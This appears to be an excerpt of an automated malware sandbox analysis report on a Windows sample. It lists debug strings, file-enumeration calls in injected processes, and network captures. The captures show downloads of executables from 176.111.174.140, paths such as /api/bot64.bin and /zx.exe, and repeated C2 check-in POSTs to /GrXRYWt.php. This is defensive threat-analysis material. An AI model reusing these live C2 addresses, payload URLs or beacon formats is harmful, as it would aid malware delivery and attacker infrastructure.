Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903601715.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900804995.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905432478.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907164099.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908502115.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: A91B.tmp.zx.exe, 0000000B.00000002.1935221826.00007FFE126E1000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1902399455.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905810924.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905141796.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1906781587.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900933834.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vcruntime140.amd64.pdbGCTL source: A91B.tmp.zx.exe, 00000008.00000003.1899054230.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000002.1935586245.00007FFE1321E000.00000002.00000001.01000000.0000000C.sdmp, VCRUNTIME140.dll.8.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904181487.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900525762.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901075570.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1906461202.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\select.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904577622.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.8.dr
Source:	Binary string: ucrtbase.pdbUGP source: A91B.tmp.zx.exe, 0000000B.00000002.1935038429.00007FFE01385000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: vcruntime140.amd64.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899054230.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000002.1935586245.00007FFE1321E000.00000002.00000001.01000000.0000000C.sdmp, VCRUNTIME140.dll.8.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908933126.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901491052.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905286921.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.8.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903999756.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900668023.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1906129171.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\python38.pdb source: A91B.tmp.zx.exe, 0000000B.00000002.1934115016.00007FFDFB98D000.00000002.00000001.01000000.0000000B.sdmp, python38.dll.8.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903212710.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907852039.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904391027.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903807898.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1909129219.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904766573.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905638202.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904955189.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901347580.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908018909.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1902885369.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1902687569.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907351373.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908752595.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.8.dr

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E17059EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	0_2_00007FF6E17059EC
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC06AE0 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,	2_2_0FC06AE0
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB59EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	3_2_00007FF699AB59EC
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F59EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	4_2_00007FF7536F59EC
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B559EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	7_2_00007FF736B559EC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00007FF632DA79B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA85A0 FindFirstFileExW,FindClose,	8_2_00007FF632DA85A0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_00007FF632DC0B84
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA85A0 FindFirstFileExW,FindClose,	11_2_00007FF632DA85A0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	11_2_00007FF632DC0B84
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	11_2_00007FF632DA79B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01343280 FindFirstFileExW,FindNextFileW,FindClose,	11_2_00007FFE01343280
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE0134303C FindFirstFileExW,FindNextFileW,FindClose,	11_2_00007FFE0134303C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E759EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	13_2_00007FF7F4E759EC

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 176.111.174.140 80

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 27 Oct 2024 18:59:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Fri, 18 Oct 2024 18:22:37 GMTETag: "3d600-624c4633f8951"Accept-Ranges: bytesContent-Length: 251392Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8c d6 90 63 c8 b7 fe 30 c8 b7 fe 30 c8 b7 fe 30 0c 72 30 30 9e b7 fe 30 0c 72 33 30 c1 b7 fe 30 c8 b7 ff 30 5a b7 fe 30 34 c0 47 30 c7 b7 fe 30 0c 72 31 30 ee b7 fe 30 34 c0 42 30 c9 b7 fe 30 ef 71 2d 30 c1 b7 fe 30 ef 71 34 30 c9 b7 fe 30 ef 71 32 30 c9 b7 fe 30 52 69 63 68 c8 b7 fe 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 6d a7 12 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 e4 00 00 00 16 03 00 00 00 00 00 e0 45 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 04 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 68 01 00 57 00 00 00 f4 59 01 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 b0 0d 00 00 00 00 00 00 00 00 00 00 00 10 04 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 42 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 e2 00 00 00 10 00 00 00 e4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 87 68 00 00 00 00 01 00 00 6a 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 8e 02 00 00 70 01 00 00 68 02 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 b0 0d 00 00 00 00 04 00 00 0e 00 00 00 ba 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a0 0d 00 00 00 10 04 00 00 0e 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 27 Oct 2024 18:59:07 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 24 Oct 2024 23:02:05 GMTETag: "47200-62540fdb871e7"Accept-Ranges: bytesContent-Length: 291328Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 cb e0 d8 65 aa 8e 8b 65 aa 8e 8b 65 aa 8e 8b 65 aa 8f 8b e5 aa 8e 8b 99 dd 37 8b 62 aa 8e 8b a1 6f 43 8b 6f aa 8e 8b a1 6f 41 8b 5a aa 8e 8b a1 6f 40 8b d4 aa 8e 8b 42 6c 40 8b 60 aa 8e 8b 42 6c 41 8b 70 aa 8e 8b 42 6c 44 8b 64 aa 8e 8b 42 6c 47 8b 64 aa 8e 8b 42 6c 42 8b 64 aa 8e 8b 52 69 63 68 65 aa 8e 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 ed d1 1a 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 0a 03 00 00 0a 02 00 00 00 00 00 f0 e8 01 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 05 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 fd 03 00 56 00 00 00 d4 f1 03 00 50 00 00 00 00 10 05 00 88 02 00 00 00 d0 04 00 28 32 00 00 00 00 00 00 00 00 00 00 00 20 05 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 a4 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 26 de 00 00 00 20 03 00 00 e0 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 cc 00 00 00 00 04 00 00 28 00 00 00 ee 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 32 00 00 00 d0 04 00 00 34 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 88 02 00 00 00 10 05 00 00 04 00 00 00 4a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3e 22 00 00 00 20 05 00 00 24 00 00 00 4e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 27 Oct 2024 18:59:13 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sat, 26 Oct 2024 18:22:41 GMTETag: "5a4531-625655231d3e4"Accept-Ranges: bytesContent-Length: 5915953Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 71 33 1d 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 56 1a 5b 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 176.111.174.140 176.111.174.140

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WILWAWPL WILWAWPL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49737 -> 176.111.174.140:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49733 -> 176.111.174.140:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49732 -> 176.111.174.140:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /api/loader.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 40
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
